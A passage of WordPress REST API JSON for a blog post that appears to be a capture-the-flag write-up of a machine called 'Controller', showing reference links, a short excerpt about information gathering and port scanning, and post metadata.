href=\"https:\/\/www.youtube.com\/watch?v=wXnUaOHGZXk\">https:\/\/www.youtube.com\/watch?v=wXnUaOHGZXk<\/a><\/p>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1AM4m1f7LT\/\">https:\/\/www.bilibili.com\/video\/BV1AM4m1f7LT\/<\/a><\/p>\n<p><a href=\"https:\/\/raw.githubusercontent.com\/CooLaToS\/wt\/main\/Controller\">https:\/\/raw.githubusercontent.com\/CooLaToS\/wt\/main\/Controller<\/a><\/p>\n<p><a href=\"https:\/\/blog.csdn.net\/xdeclearn\/article\/details\/120740844\">https:\/\/blog.csdn.net\/xdeclearn\/article\/details\/120740844<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Controller \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Controller] [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-795","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/795","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=795"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/795\/revisions"}],"predecessor-version":[{"id":796,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/795\/revisions\/796"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=795"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=795"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=795"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}